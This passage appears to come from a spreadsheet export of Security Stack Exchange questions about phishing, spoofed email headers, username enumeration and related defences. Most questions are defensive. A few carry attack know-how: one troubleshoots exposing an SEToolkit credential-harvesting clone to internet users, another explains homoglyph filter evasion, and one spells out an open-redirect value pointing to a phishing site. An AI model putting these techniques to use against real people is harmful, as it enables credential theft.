 &lt;li&gt;&lt;p&gt;Requiring a complex system generated username like the &lt;a href="https://secure.hmce.gov.uk/ecom/voes/login.jsp" rel="noreferrer"&gt;UK government gateway&lt;/a&gt; or &lt;a href="http://www.hsbc.co.uk" rel="noreferrer"&gt;HSBC on-line banking&lt;/a&gt;? Is the trade-off in terms of users forgetting this, needing to write it down, the additional call center traffic, users having to self service username reminder worthwhile vs the risk of using a public username such as email address or mobile number?&lt;/p&gt;&lt;/li&gt;
 &lt;li&gt;&lt;p&gt;Providing a generic message: "your username or password was incorrect" instead of more user friendly "your username was not recognized" and "your password was incorrect"&lt;/p&gt;&lt;/li&gt;
 &lt;li&gt;&lt;p&gt;Using the following type of login sequence where a site-key or user selected personal pass-phrase to assist in identifying phishing sites is used:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;Enter username and simple secret value (e.g. postcode) &lt;/li&gt;
 &lt;li&gt;If invalid they are provided an error: username or value is incorrect &lt;/li&gt;
 &lt;li&gt;If these are valid the users personal site-key image is shown and the password is requested &lt;/li&gt;
 &lt;li&gt;If invalid password, error message incorrect password &lt;/li&gt;
 &lt;li&gt;If valid access granted &lt;/li&gt;
 &lt;/ul&gt;&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;As opposed to the more friendly way on say Quora.com where you get shown your picture on correct username entry. Is this acceptable only on low risk Q&amp;amp;A site?&lt;/p&gt;
 &lt;p&gt;My colleagues argue for keeping usernames secret and the above type measures:&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;Mass username enumeration allows you to try dictionary and bruteforce attempts against a site&lt;/li&gt;
 &lt;li&gt;it enables you to dos a site by locking all the accounts where account lockout is enabled&lt;/li&gt;
 &lt;li&gt;Users like to use the same username and password across sites and many sites use e-mail address and mobile number for their sites. If users share credentials between sites, then credentials could be stolen or phished from the other sites and then used to access your site&lt;/li&gt;
 &lt;li&gt;Publicly known facts, such as mobile and e-mail, do not count towards authentication strength. If username is a known fact, to maintain the same level of security the password must be significantly stronger to make up for the statistical difference e.g. if username and password both have min of 6 characters, then assuming 52 possible characters we have 52^12 combinations. However, if username is a known fact then that becomes just 52^6 combinations; you have to increase the password to 12 characters minimum to get the same level of protection ‚Äì failure to do this would increase account takeover risk.&lt;/li&gt;
 &lt;/ol&gt;
 &lt;p&gt;I counter for each:&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;Your real control against this is password length, complexity and account lockout policy&lt;/li&gt;
 &lt;li&gt;You can mitigate this by having auto unlock after period of time (e.g. 5 - 30 mins), have a mass unlock function, have exponential back-off or IP banning for a period of time after a number of bad attempts, selective anti-automation controls (e.g. Captcha, Roboo script) displayed after a number of failed attempts&lt;/li&gt;
 &lt;li&gt;User education, a second authentication factor, adaptive authentication (e.g. step-up or graduated authentication based on device ID, location etc) would be better defenses against this&lt;/li&gt;
 &lt;li&gt;I see username as identity and password as authentication. If you want a stronger authentication make the password longer or require 2 passwords - leave identification alone&lt;/li&gt;
 &lt;/ol&gt;
 &lt;p&gt;Happy to learn and change my position. Thanks in advance.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;authentication&gt;&lt;identity&gt;</t>
  </si>
  <si>
    <t>Has someone quantified how much more effective typodomains are than random websites in phishing attacks?</t>
  </si>
  <si>
    <t>&lt;p&gt;Has someone done an actual study on how effective typo domains are versus random websites in phishing links?&lt;/p&gt;
 &lt;p&gt;I am trying to justify the expense of going after typosquatters and the possibility of the domains being used as a phishing attack is my best argument at this point, but a lot of the phishing attacks against our users don't even bother to try having a related domain name (a bunch of them are just random WordPress sites that have been hacked). If someone has hard numbers like 25% of phishing attempts are successful with random domain names, but 75% are successful with a typo domain, then it makes a strong case for going after them preemptively; however, if the chances of the attacks are roughly the same, then the reactively going after a site after we see it attacking our users probably makes more sense.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;phishing&gt;&lt;typosquatting&gt;</t>
  </si>
  <si>
    <t>Does Google check for Unicode characters to determine spam now in Gmail?</t>
  </si>
  <si>
    <t>&lt;p&gt;I was reading some tweets from @pwnallthethings regarding the John Podesta spear phishing emails. &lt;/p&gt;
 &lt;p&gt;What the email looked like:&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://i.stack.imgur.com/TEn5t.png" rel="noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/TEn5t.png" alt="enter image description here"&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;The &lt;code&gt;Change Password&lt;/code&gt; button link, notice the domain &lt;code&gt;com-securitysettingpage.tk&lt;/code&gt;&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://i.stack.imgur.com/ysdE3.png" rel="noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/ysdE3.png" alt="enter image description here"&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;From @pwnallthethings:&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;You're probably thinking "wow how come Google algorithms didn't catch
  this email, it's right there asking for your password?". Because the
  letters aren't English to trick the filters. Hackers are smart.&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;To be specific they are probably Homoglyph unicode characters. Below you can find quite a nice tool to create a text using homoglyphs. &lt;/p&gt;
 &lt;p&gt;&lt;a href="https://www.irongeek.com/homoglyph-attack-generator.php" rel="noreferrer"&gt;https://www.irongeek.com/homoglyph-attack-generator.php&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;Example:&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;ASCII:&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;Ogglas&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;Homoglyph unicode:&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;Œü…°…°‚Öº…ë—ï&lt;/p&gt;
 &lt;p&gt;Does Gmail check Unicode now or is this "vulnerability" still in affect? Most of the spam emails I receive are correctly identified but some still slip through. Some using Unicode but some are still plain ASCII characters. &lt;/p&gt;
 &lt;p&gt;Find Unicode characters using Notepad++:&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://stackoverflow.com/a/20890052/3850405"&gt;https://stackoverflow.com/a/20890052/3850405&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;Some more articles:&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://www.nytimes.com/interactive/2017/01/06/us/russian-hack-evidence.html" rel="noreferrer"&gt;https://www.nytimes.com/interactive/2017/01/06/us/russian-hack-evidence.html&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;&lt;a href="http://p3isys.com/p3isys-tech-blog/153-podestahack" rel="noreferrer"&gt;http://p3isys.com/p3isys-tech-blog/153-podestahack&lt;/a&gt;&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;google&gt;&lt;phishing&gt;&lt;gmail&gt;</t>
  </si>
  <si>
    <t>"Phishing" red flags and countermeasures</t>
  </si>
  <si>
    <t>&lt;p&gt;Given the recent spate of intrusions into various networks which have included compromise of subscriber identity and contact information, I figured it would be good for us to have a thread on how to spot and react to a "phishing" attempt.&lt;/p&gt;
 &lt;p&gt;While the most common and prominent avenue for phishing is by e-mail, these social engineering attempts can really take on any form. If Oscar has all of Alice's contact information (as may be the case in recent high-profile attacks) he may try to manipulate her via e-mail, phone call, SMS, or even by postal letter.&lt;/p&gt;
 &lt;p&gt;Oscar's attacks can be further augmented by intimate knowledge of Alice's more personal details. (Again, these may have been gained in some recent incidents.) Such details may include credit card numbers, purchase histories, birth date, dependents, "security questions and answers", etc.&lt;/p&gt;
 &lt;p&gt;Still, regardless of the attack vector and complexity, there are a number of features that often set phishing attempts apart from legitimate vendor correspondence. Additionally, there's a number of preventative and reactive measures which can be taken to protect oneself from falling victim to these attacks.&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;&lt;p&gt;&lt;strong&gt;What are some "red flags" that are commonly found in phishing attempts?&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;
 &lt;li&gt;&lt;p&gt;&lt;strong&gt;What are some ways Alice can verify the identity of a suspected phisher, if she believes the contact may be legitimate?&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;
 &lt;li&gt;&lt;p&gt;&lt;strong&gt;If a suspect message includes a request for actions to be taken by Alice, and she believes the message may be legitimate, how should she follow up?&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;Again, answers are welcome for all attack vectors which may be used by someone with complete contact information for the target, possibly including:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;E-mail&lt;/li&gt;
 &lt;li&gt;Phone number
 &lt;ul&gt;
 &lt;li&gt;Voice call - "vishing"&lt;/li&gt;
 &lt;li&gt;SMS messaging - "smishing"&lt;/li&gt;
 &lt;/ul&gt;&lt;/li&gt;
 &lt;li&gt;Physical address
 &lt;ul&gt;
 &lt;li&gt;Postal mail&lt;/li&gt;
 &lt;li&gt;Door-to-door solicitation&lt;/li&gt;
 &lt;/ul&gt;&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;&lt;em&gt;Note to moderators - This thread might be a good fit for Community Wiki.&lt;/em&gt;&lt;/p&gt;</t>
  </si>
  <si>
    <t>Are browser wrappers in software bad for users?</t>
  </si>
  <si>
    <t>&lt;p&gt;These days I see a lot of browser wrappers in software. For example: &lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;when you purchase something in the Steam desktop application and use PayPal, you enter your PayPal security details in a browser frame provided by Steam.
 &lt;a href="https://i.stack.imgur.com/puR6t.png" rel="noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/puR6t.png" alt="log into paypal in the Steam Desktop App"&gt;&lt;/a&gt;&lt;/li&gt;
 &lt;li&gt;when you log in on the Figma Desktop App with Google, you enter your Google credentials in a browser provided by the Figma Desktop App
 &lt;a href="https://i.stack.imgur.com/mL9aY.png" rel="noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/mL9aY.png" alt="Figma Desktop App login with Google"&gt;&lt;/a&gt;&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;Like trusting my browser, I trust these applications to not mess with the website or frame in any way. For example injecting javascript, showing a phishing page, showing HTTPS when there's no secure connection.&lt;/p&gt;
 &lt;p&gt;What I'm worried about is users getting used to this kind of presentation. They're exposure to these kinds of browser wrappers might give them the idea that it's OK to trust these kinds of wrappers and freely enter any kind of information there. Not knowing that hijacked or malicious applications could trick users into giving up their details.&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;Question:&lt;/strong&gt; am I missing something here or is this a trend that needs to be put to halt? (and instead just serve webpages in the users' preferred web browser)&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;web-browser&gt;&lt;software&gt;&lt;user-education&gt;&lt;iframe&gt;</t>
  </si>
  <si>
    <t>Why does DKIM verification succeed with a signature from Yahoo when all headers are spoofed to look like GMail?</t>
  </si>
  <si>
    <t>&lt;p&gt;Today I got a scam e-mail which I decided to disect. I quickly found that it was sent from a GMail address (&lt;code&gt;From&lt;/code&gt;, &lt;code&gt;Reply-To&lt;/code&gt;, &lt;code&gt;Return-Path&lt;/code&gt;) but that the mail itself came from Yahoo.&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;HELO from Yahoo&lt;/li&gt;
 &lt;li&gt;Received from IP maps both forward and reverse&lt;/li&gt;
 &lt;li&gt;Mail has valid DKIM signature for yahoo.com&lt;/li&gt;
 &lt;li&gt;Mail soft-fails GMail SPF because a Yahoo-owned IP is not part of it&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;I've piped the mail through opendkim-testmsg, which tells me the message is fine.&lt;/p&gt;
 &lt;p&gt;I'm really confused by all of this. Of course anyone &lt;strong&gt;can&lt;/strong&gt; technically sign any email using DKIM for their own domain, even if it doesn't match any of the domains used in the mail. But why would Yahoo do this? And why doesn't OpenDKIM indicate that there's something phishy about this mail, even though the Return-Path domain and the DKIM domain don't match?&lt;/p&gt;
 &lt;p&gt;By popular request, some e-mail headers. Please note that this e-mail has been through a corporate mail washing service, Exchange and I stripped a lot of identifying data. The DKIM signature for the header portion still matches, though. I've omitted the body, but it also validates.&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;Received-SPF: softfail (MYMX: transitioning domain of gmail.com does not designate 87.248.110.97 as permitted sender) client-ip=87.248.110.97; envelope-from=helenslomonn@gmail.com; helo=sonic302-34.consmr.mail.ir2.yahoo.com;
 Received: from sonic302-34.consmr.mail.ir2.yahoo.com ([87.248.110.97])
  by MYMX with esmtps (TLSv1.2:ECDHE-RSA-AES128-GCM-SHA256:128)
  (envelope-from &amp;lt;helenslomonn@gmail.com&amp;gt;)
  for MYNAME@MYDOMAIN; Wed, 28 Feb 2018 05:03:02 -0800
 DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=yahoo.com; s=s2048; t=1519822976; bh=35/Syp7oOntp7GfGR2tdK316KBE4uAxZC5lOM//DYjg=; h=Date:From:Reply-To:Subject:References:From:Subject; b=KvnuAmNY1sujXiLsVnNqOJzF3MFxu/jY93zu5QKtbWRy9nMOhomUrZ+398oRwLC0P0RAkCbOj5a2x5JZtrZG4/71RKmHD/ftzOJI2goX2A4KaWrsczH4RsR/kfvpmz0jNRF4nxZONN4a5NKLavt6WPG7yWokVrGh2n/zUZPiFFv8kZL0uNPdIyCC94OiBh0c6GlSRpmTe0GbTQmbDgXZ+8nf7O5kiWpALbpSBHJ22QmdFhLLQWS18xZhl/AwprHFV+txsWtat02ldjYUmoGKhXNmTcWHDLPw7n5uyKXwsaOuX1uXSLzaWUgpnrD/v/FonebJoo1qkcnZoziov6TJmw==
 X-YMail-OSG: dOZOfQ0VM1lyzg2OUT1yoveGRURYm6FHV_CU8qWTCRbr8jkKD_gBSwprVT5nSNr
  oxL32bI8ge8m_n_BDyDXFKnfZTDdFMGUPxFQt8bl2TLbWIC72.HGgEg6S8trxoSkeYLsPM8tUIhL
  XPCdlp3sNlz4quLJyyJznVo55S3vYeLt5fYSOqw2kJtOvf3l.puohOlVCc5WBZO1lp82MLbBi0rq
  0tCsbA3xDFW8_3JsxoJGinZ8fn0BBoqUfkfFdGv7UyoM94wlv4_GWYAQwIzicSQsC5od.fBm1lM_
  zSZlsV9hfeDUkwDyQiAmFq5rCUJ.3N7Lu9IKZTwnKjWvRFNudXOkEEJwW7Dg0eRNCBx.N2c.52Bi
  dfwYepO_0jqL.vF19srHCbj6PrUQjFYiIzaauD.m9IdfE692oG6o9B.w20VkMLmTcxjBKg7NC1pk
  6mWavSA7yHndoNrMfcB.liBw3XSLggRvPH60M
 Received: from sonic.gate.mail.ne1.yahoo.com by sonic302.consmr.mail.ir2.yahoo.com with HTTP; Wed, 28 Feb 2018 13:02:56 +0000
 Date: Wed, 28 Feb 2018 13:02:52 +0000 (UTC)
 From: hs &amp;lt;helenslomonn@gmail.com&amp;gt;
 Reply-To: hs &amp;lt;helensslomonn@gmail.com&amp;gt;
 Message-ID: &amp;lt;909434698.11100734.1519822972957@mail.yahoo.com&amp;gt;
 Subject: MRS.HELEN SOLOMON FUNDS TRANSFER ASSISTANCE.
 Content-Type: text/plain; charset="UTF-8"
 Content-Transfer-Encoding: quoted-printable
 References: &amp;lt;909434698.11100734.1519822972957.ref@mail.yahoo.com&amp;gt;
 To: Undisclosed recipients:;
 Return-Path: helenslomonn@gmail.com
 MIME-Version: 1.0
 &lt;/code&gt;&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;email&gt;&lt;phishing&gt;&lt;gmail&gt;&lt;dkim&gt;&lt;yahoo&gt;</t>
  </si>
  <si>
    <t>Aren't password managers still incredibly risky?</t>
  </si>
  <si>
    <t>&lt;p&gt;I understand the utility in having one application remember a bunch of long, randomized passwords, but all you'd need is one well-placed phishing scam or a keylogger and they get all the keys to the kingdom.&lt;/p&gt;
 &lt;p&gt;Has there been any progress in this area? I want to consider using a password manager but feel incredibly uncomfortable with putting all my eggs in one basket. I could theoretically have multiple managers and only remember 3 long passwords or so (try to diversify the risk), but I feel like that only goes so far.&lt;/p&gt;
 &lt;p&gt;It is frustrating that the best passwords seem to be exactly the ones that you cannot memorize well. Where do I draw the line?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;passwords&gt;&lt;hash&gt;&lt;password-management&gt;&lt;password-policy&gt;</t>
  </si>
  <si>
    <t>SEToolkit cloned website can be viewed over internet, but does not harvest credentials</t>
  </si>
  <si>
    <t>&lt;p&gt;I've been working with SEToolkit's website cloner/credential harvester. Everything works fine locally: The clone opens on the victim pc, victim inputs credentials, after submitting the victim is redirected to the real page and the credentials are stored in a text file.&lt;/p&gt;
 &lt;p&gt;However, when I port forward port 80 for the private IP of the Apache server, the website can be viewed but it hangs once the user submits the credentials. The credentials are never stored and the user is never redirected to the real page.&lt;/p&gt;
 &lt;p&gt;I was wondering if anyone here has encountered this issue as I have not seen this question come up through google searches. Thanks in advance for any help!&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;penetration-test&gt;&lt;phishing&gt;&lt;kali-linux&gt;</t>
  </si>
  <si>
    <t>How can users be sure the browser's URL bar is not faked?</t>
  </si>
  <si>
    <t>&lt;p&gt;For a user to defend against something like
 &lt;a href="https://security.stackexchange.com/questions/52115/dont-understand-how-my-mums-gmail-account-was-hacked"&gt;Don&amp;#39;t understand how my mum&amp;#39;s Gmail account was hacked&lt;/a&gt; , they should pay attention to URL bar before typing their credentials.&lt;/p&gt;
 &lt;p&gt;But how can you make sure it's really the browsers URL bar that you are looking at?&lt;/p&gt;
 &lt;p&gt;Phishing site could look non-suspicious by:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;Opening a popup without URL bar and emulating the URL bar functionality;&lt;/li&gt;
 &lt;li&gt;Going into fullscreen mode and emulating URL bar (think mobile device browsers);&lt;/li&gt;
 &lt;li&gt;Possibly many other ways, depending on device where the browser is running.&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;Is there a common (to different browsers, operating systems) guideline for users to detect such an attack?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;web-browser&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>SMS spoofing detection</t>
  </si>
  <si>
    <t>&lt;p&gt;Our company uses SMS delivery providers like Nexmo etc. We have noticed some of our recipients have received phishing sms messages from fraudsters where the number/sender name was spoofed to match our company's name.&lt;/p&gt;
 &lt;p&gt;Is it possible to backtrack theses messages to identify the source? BTW We don't control/have access to recipients phones. &lt;/p&gt;
 &lt;p&gt;What measures can we take to ensure that such messages can be detected and our number/sender name is not spoofed.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;phishing&gt;&lt;spoofing&gt;&lt;sms&gt;</t>
  </si>
  <si>
    <t>Why do phishing emails have spelling and grammar mistakes?</t>
  </si>
  <si>
    <t>&lt;p&gt;Are the spelling and grammar mistakes in phishing emails done on purpose? Is there some wisdom behind it? Or they are simply indicative of the fact that they've been written by someone who does not natively speak English?&lt;/p&gt;</t>
  </si>
  <si>
    <t>Yahoo sent folders contains unsubscribe emails (And they aren't from me)</t>
  </si>
  <si>
    <t>&lt;p&gt;I continue to see emails in my sent folder that I haven't sent. I change my password and it stops for a few days only to return. What could they be? Why would yahoo send unsubscribe emails?&lt;/p&gt;
 &lt;p&gt;Example: unsubscribe@neptunecigar.com
 Below that line my yahoo email is listed.&lt;/p&gt;
 &lt;p&gt;I change my password but they still come back. I've also had these emails and happen to notice if I have a file open, working on, the file shows weird symbols. Or, the file will tell me it's been corrupted.&lt;/p&gt;</t>
  </si>
  <si>
    <t>I received an phishing email from myself</t>
  </si>
  <si>
    <t>&lt;p&gt;So today when I was checking my spam folder on my outlook account, I noticed I had received an email from my own address.&lt;br&gt;
 The email looks like a typical scam: &lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;Claims to have installed a RAT on my system &lt;/li&gt;
 &lt;li&gt;Claims to have footage of me pleasuring myself &lt;/li&gt;
 &lt;li&gt;Demands that I pay him money with the cryptocurrency DASH&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;According to haveibeenpwned, my email was found on the July 2018 Animoto breach.&lt;br&gt;
 I have never used this site. I have used a similar service called 'PowToon', but as far as I can tell, they aren't related. &lt;/p&gt;
 &lt;p&gt;I have already: &lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;Changed the password of my Microsoft account (and made sure 2FA is still active)&lt;/li&gt;
 &lt;li&gt;Made sure there isn't any suspicious devices or login activity registered&lt;/li&gt;
 &lt;li&gt;Ran a virus scan on my system (Nothing found) &lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;At this point, I'm pretty sure this is just a spoofed email address, but I want to guarantee everything is alright.&lt;br&gt;
 This is the header of the email:&lt;br&gt;
 &lt;a href="https://pastebin.com/LD92Y3m2" rel="nofollow noreferrer"&gt;https://pastebin.com/LD92Y3m2&lt;/a&gt;&lt;br&gt;
 Am I safe? What other precautions should I take?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;email&gt;&lt;phishing&gt;&lt;email-spoofing&gt;&lt;scam&gt;</t>
  </si>
  <si>
    <t>Security concern to implement a web based remote desktop</t>
  </si>
  <si>
    <t>&lt;p&gt;I am implementing a web based remote desktop application.Through this application client can connect to the server and can access the server using JSP/Servlet Java robot class.&lt;/p&gt;
 &lt;p&gt;I can configure the server to listen on port 6060 or any other port, but what kind of security measure I need to take to secure the connection. I know how to authenticate the client before establishing the connection i.e. using login page and chaptcha to prevent phishing attack and dictionary attack. &lt;/p&gt;
 &lt;p&gt;Another issues would be if I enable the client to upload a file to server, then how can I detect that the files is safe, is there any program to detect malicious files, or it only depends on the anti virus software.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;encryption&gt;&lt;authentication&gt;&lt;java&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>User's submitted ID in URLs, can it open some vulnerability?</t>
  </si>
  <si>
    <t>&lt;p&gt;&lt;strong&gt;On the website I'm building&lt;/strong&gt; users can submit links to various of their personal page: YouTube accounts, Twitter, Facebook and a lot more. When he does so he furnishes the ID to his account. For example if the user &lt;em&gt;freddiew&lt;/em&gt; wants to link his YouTube account, he just enter &lt;code&gt;freddiew&lt;/code&gt; in the field and a link to &lt;code&gt;https://www.youtube.com/user/freddiew&lt;/code&gt; will appear on his page.&lt;/p&gt;
 &lt;p&gt;I do it this way to prevent fishing. I'm wondering if there are things I need to worry about that I didn't think of? Better safe than sorry.&lt;/p&gt;
 &lt;p&gt;To clarify on the website I'm making an user can give his Steam id for example.&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;He types his Steam ID: &lt;code&gt;louis&lt;/code&gt;.&lt;/li&gt;
 &lt;li&gt;On his profile page a link will appear : &lt;code&gt;http://steamcommunity.com/id/Louis&lt;/code&gt;.&lt;/li&gt;
 &lt;/ol&gt;
 &lt;p&gt;My question is: is there a way for the user to redirect someone by adding some special string? In the same fashion you can add &lt;code&gt;&amp;amp;direction=right&lt;/code&gt; to add a parameter, is there a string that don't know about that can redirect the user like &lt;code&gt;&amp;amp;redirect=true&amp;amp;url=myphishingsite.com&lt;/code&gt;? I doubt it but I wanna be sure.&lt;/p&gt;
 &lt;p&gt;The reason I'm paranoid is because some of these sites I'm linking to are notorious for having people fall for phishing on them. I wanna save my users that hassle.&lt;/p&gt;
 &lt;p&gt;For example &lt;a href="http://www.securitypentest.com/2011/02/facebook-url-redirect-vulnerability.html" rel="nofollow"&gt;Facebook didn't sanitize an input that would redirect&lt;/a&gt; . It is fixed now but it did happen. So should I regex the input? If so, what char should I not allow?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;phishing&gt;&lt;url-redirection&gt;&lt;url&gt;</t>
  </si>
  <si>
    <t>What are Outlook's safe links?</t>
  </si>
  <si>
    <t>&lt;p&gt;People using outlook.com as their mailbox may know this: If you receive an e-mail with a web link in it and copy the link with "right-click + copy link location" you will receive an outlook protection link. For example "&lt;a href="https://test.com" rel="nofollow noreferrer"&gt;https://test.com&lt;/a&gt;", will become this protection link (in my case):&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;"https://eur01.safelinks.protection.outlook.com/?url=https%3A%2F%2Ftest.com&amp;amp;data=02%7C01%7C%7Ccb2efbed1ae44d545cac08d644e7b37d%7C84df9e7fe9f640afb435aaaaaaaaaaaa%7C1%7C0%7C636772159263508835&amp;amp;sdata=8BK6la8r8jweL6T0bH9cm7VNzh5IIrx7hVL0ASZc6GU%3D&amp;amp;reserved=0".
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;This is some sort of protection, but I cannot see what attack it is preventing. Does anyone know for what this "link wrapping" is? I also wonder, what the data and sdata parameters are. (Seem to be hashes? [of the website?])&lt;/p&gt;</t>
  </si>
  <si>
    <t>Is it a myth that signing up for social media puts your email open for phishing attacks?</t>
  </si>
  <si>
    <t>&lt;p&gt;So far I have owned a Google profile since 2016, and I had no problems until now when I began detecting unusual/bizarre messages in my 'Spam' folder.&lt;/p&gt;
 &lt;p&gt;This suspects me that operating a social networking account (e.g., Twitter), which I did back in August, also puts your email open to spam. Earlier today I got a weird message in my 'Spam' folder from some stranger with the heading 'BUSINESS INQUIRIES', along with an attachment leading to a Word document. Since I hardly knew Word attachments might contain Macros, I simply deleted it from my Gmail. I have had similar emails, some which have links or otherwise nothing.&lt;/p&gt;
 &lt;p&gt;For most of us it's hard to tell if each social media platform's user database is not completely secure, i.e., is easily accessible by the general public so that anyone can read and use that information, but not everyone (especially experts) is aware of this since it's basically a myth. However if I knew what would happen after joining a social media platform and were to run into issues related to spam/phishing, then I probably should bring the attention to all.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;email&gt;&lt;phishing&gt;&lt;social-media&gt;</t>
  </si>
  <si>
    <t>Spoofed email? "X-Source-Sender" and "Received" headers look dodgy</t>
  </si>
  <si>
    <t>&lt;p&gt;I got sent an email from someone in response to an over 2 year old exchange, and the contents of it look like spam to me.&lt;/p&gt;
 &lt;p&gt;Checking the headers the following looks normal:&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;Return-Path&lt;/strong&gt;
 &lt;strong&gt;Received &amp;amp; Received-SPF:&lt;/strong&gt;&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;Received: from gateway34.websitewelcome.com (gateway34.websitewelcome.com. [192.185.150.114])
  by mx.google.com with ESMTPS id v2si12361706otn.296.2021.03.09.10.56.01
  for &amp;lt;[my email redacted]&amp;gt;
  (version=TLS1_2 cipher=ECDHE-ECDSA-AES128-GCM-SHA256 bits=128/128);
  Tue, 09 Mar 2021 10:56:01 -0800 (PST)
 Received-SPF: pass (google.com: domain of [real user email redacted] designates 192.185.150.114 as permitted sender) client-ip=192.185.150.114;
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;&lt;strong&gt;Authentication-Results and others:&lt;/strong&gt;&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;Authentication-Results: mx.google.com;
  dkim=pass header.i=@[user real domain redacted] header.s=default header.b=i7HIMnGa;
  spf=pass (google.com: domain of [real user email redacted] designates 192.185.150.114 as permitted sender) smtp.mailfrom=[real user email redacted]
 Received: from cm10.websitewelcome.com (cm10.websitewelcome.com [100.42.49.4])
 by gateway34.websitewelcome.com (Postfix) with ESMTP id 670551B8D18
 for &amp;lt;[my user email redacted]&amp;gt;; Tue, 9 Mar 2021 12:55:59 -0600 (CST)
 Received: from box2063.bluehost.com ([67.222.39.95])
 by cmsmtp with SMTP
 id JhWQlljlHkscSJhWRlkpRs; Tue, 09 Mar 2021 12:55:59 -0600
 X-Authority-Reason: nr=8
 DKIM-Signature: v=1; a=rsa-sha256; q=dns/txt; c=relaxed/relaxed;
 d=[real user domain redacted]; s=default; h=Content-Transfer-Encoding:Content-Type
 :Message-ID:Date:References:In-Reply-To:Subject:To:From:MIME-Version:Sender:
 Reply-To:Cc:Content-ID:Content-Description:Resent-Date:Resent-From:
 Resent-Sender:Resent-To:Resent-Cc:Resent-Message-ID:List-Id:List-Help:
 List-Unsubscribe:List-Subscribe:List-Post:List-Owner:List-Archive;
 bh=[string redacted, unsure if safe to post]
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;&lt;strong&gt;This one looks dodgy?&lt;/strong&gt; (As it appears it originates from France, not the country the actual sender is in or websitewelcome and probably not bluehost either)&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;Received: from lfbn-poi-1-1523-161.w109-220.abo.wanadoo.fr ([109.220.87.161]:64877 helo=[169.254.135.18])
 by box2063.bluehost.com with esmtpsa (TLS1.2) tls TLS_DHE_RSA_WITH_AES_256_GCM_SHA384
 (Exim 4.93)
 (envelope-from &amp;lt;[real user email redacted]&amp;gt;)
 id 1lJhWQ-000Icb-El
 for [my email redacted]; Tue, 09 Mar 2021 11:55:58 -0700
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;&lt;strong&gt;X-Headers:&lt;/strong&gt; The &lt;em&gt;X-Source-IP&lt;/em&gt; and &lt;em&gt;X-Source-Sender&lt;/em&gt; look dodgy.&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
 X-AntiAbuse: Primary Hostname - box2063.bluehost.com
 X-AntiAbuse: Original Domain - [my domain name redacted]
 X-AntiAbuse: Originator/Caller UID/GID - [47 12] / [47 12]
 X-AntiAbuse: Sender Address Domain - [real user domain name redacted]
 X-BWhitelist: no
 X-Source-IP: 109.220.87.161
 X-Source-L: No
 X-Exim-ID: 1lJhWQ-000Icb-El
 X-Source:
 X-Source-Args:
 X-Source-Dir:
 X-Source-Sender: lfbn-poi-1-1523-161.w109-220.abo.wanadoo.fr ([169.254.135.18]) [109.220.87.161]:64877
 X-Source-Auth: [real user email redacted]
